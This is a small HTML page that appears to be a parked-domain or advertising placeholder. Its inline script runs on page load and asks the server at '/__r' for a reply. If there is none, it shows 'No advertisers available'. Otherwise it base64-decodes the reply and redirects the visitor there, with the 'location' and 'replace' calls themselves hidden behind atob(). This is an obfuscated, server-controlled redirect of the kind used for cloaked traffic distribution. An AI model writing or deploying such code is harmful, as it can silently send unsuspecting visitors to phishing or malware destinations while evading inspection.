<!doctype html>
<html lang="en">
    <head>
        <meta charset="utf-8" />
        <meta name="viewport" content="width=device-width,initial-scale=1" />
        <title></title>
        <style>
            html,
            body {
                height: 100%;
                margin: 0;
                font-family:
                    system-ui,
                    -apple-system,
                    Segoe UI,
                    Roboto,
                    Arial,
                    sans-serif;
            }
            main {
                height: 100%;
                display: grid;
                place-items: center;
            }
            small {
                opacity: 0.6;
            }
        </style>
    </head>
    <body>
        <script>
            var _d = atob;
            function placeholder() {
                document.title = location.hostname;
                document.body.innerHTML =
                    "<main><div><div></div><small>No advertisers available</small></div></main>";
                document.body.querySelector("div div").textContent = location.hostname;
            }
            fetch("/__r" + location.search)
                .then(function (res) {
                    if (res.status === 204) {
                        placeholder();
                        return;
                    }
                    if (res.status !== 200) {
                        return; 
                    }
                    return res.text().then(function (t) {
                        self[_d("bG9jYXRpb24=")][_d("cmVwbGFjZQ==")](_d(t));
                    });
                })
                .catch(function () {});
        </script>
    </body>
</html>
